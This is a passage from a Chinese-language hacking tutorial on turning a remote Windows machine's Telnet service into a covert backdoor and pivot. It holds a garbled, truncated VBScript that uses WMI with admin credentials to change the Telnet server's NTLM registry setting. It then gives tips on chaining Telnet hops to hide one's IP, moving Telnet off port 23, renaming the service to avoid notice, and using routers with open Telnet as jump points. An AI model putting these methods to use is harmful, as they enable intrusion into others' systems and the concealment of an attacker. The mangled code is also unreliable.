巧用Telnet做后门和跳板

核心提示： wt.quitend ifif wt.arguments.count<5 thenusage()wt.echo "Not enough meters."wt.quitend ifipaddress=wt.arguments(0)username=wt.argume

wt.quit

end if

if wt.arguments.count<5 then

usage()

wt.echo "Not enough meters."

wt.quit

end if

ipaddress=wt.arguments(0)

username=wt.arguments(1)

password=wt.arguments(2)

ntlm=wt.arguments(3)

port=wt.arguments(4)

if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then

usage()

wt.echo “The value of NTML is wrong.”

wt.quit

end if

if not isnumeric(port) then

usage()

wt.echo “The value of port is wrong.”

wt.quit

end if

usage()

outstreem.write “Conneting “&ipaddress&”….”

set objlocator=createt(”wbemting.swbemlocator”)

setobjswbemservices=objlocator.connectserver(ipaddress,”root/default”,username,password)

showerror(err.number)

outstreem.write “Setting NTLM=”&ntlm&”….”

set objinstance=objswbemservices.get(”stdregprov”)

set objmethod=objinstance.methods_(”SetDWORDvalue”)

set objinm=objmethod.inmeters.spawninstance_()

objinm.hdefkey=&h80000002

objinm.ssubkeyname=”SOFTWAREMicrosoftTelnetServer1.0〃

(4)通过Telnet服务器管理程序修改注册表的值后需要重启计算机才能使修改生效。

5、登陆远程Telnet服务器

使用“telnetip”命令再次登陆远程Telnet服务器，如图5所示，输入该IP地址的管理员的用户名和密码，验证通过后进入Telnet。

&说明

(1)登陆telnet成功后，在telnet客户端中就如同在本地的DOS提示符下操作一样，可以执行各种命令，如图6所示，可以查看网络连接情况。

(2)使用多重telnet可以达到隐藏自身IP的目的，也就是常说的代理功能，也就是先联入第一个Telnet服务器，然后在第一个Telnet服务器的基础上再联入第二个Telnet服务器，再联入第N个Telnet服务器。这样就不容易被发现了。

(3)使用Telnet作为后门时可以更改telnet的默认端口23为其它端口，这样就更隐蔽了。修改端口后，还可以更改Telnet的服务名称。

(4)有的路由器的telnet端口也开放了，如果知道其用户名和密码，将其作为跳板，其效果非常好。

小结

到此一个简单的Telnet后门和跳板也就制作成功了，以后就可以使用Telnet来作为跳板来执行各种操作。